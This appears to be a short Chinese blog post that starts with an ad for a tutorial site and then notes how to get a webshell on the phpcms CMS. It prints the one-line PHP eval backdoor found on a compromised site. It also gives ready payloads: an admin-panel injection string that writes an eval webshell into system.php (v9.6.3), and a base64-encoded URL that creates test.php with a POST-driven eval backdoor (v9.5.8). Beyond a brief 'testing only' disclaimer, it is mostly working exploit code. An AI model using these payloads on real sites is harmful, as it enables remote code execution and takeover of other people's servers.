强烈向大家推荐一个好网站,【我要自学网】,教程由在校老师录制,有办公会计、平面设计、室内设计、机械设计、网页编程、影视动画等教程.....让你足不出门,都可以体验学校的专业教育!
今天在处理phpcms挂马的时候遇到一个一句话木马cachesconfigssystem.php \',@eval/**/($_POST[123]),// 想了一下这个应该是网站后台写入配置文件,就网上找了一下getshell方法,记录一下
内容仅供测试使用,请遵守网络安全法
v9.6.3
安装完后登陆后台
http://127.0.0.1/phpcms/index.php?m=admin&c=index&a=login
在此处插入 \',@@eval($_POST[123]),//
,闭合掉 phpcmscachesconfigssystem.php
这里的 key 参数会将一句话木马写入 system.php 文件。
v9.5.8
http://localhost/phpcms/index.php?m=content&c=content&a=public_sub_categorys&menuid=${@fputs(fopen(base64_decode(Y2FjaGVzL2NhY2hlc19tb2RlbC9jYWNoZXNfZGF0YS90ZXN0LnBocA==),w),base64_decode(PD9waHAgdmFyX2R1bXAobWQ1KHh6KSk7JGNvbnRlbnQ9c3RyaXBzbGFzaGVzKCRfUE9TVFsxXSk7ZXZhbCgkY29udGVudCk7))}&f=
会生成 /caches/caches_model/caches_data/test.php
一句话
密码 1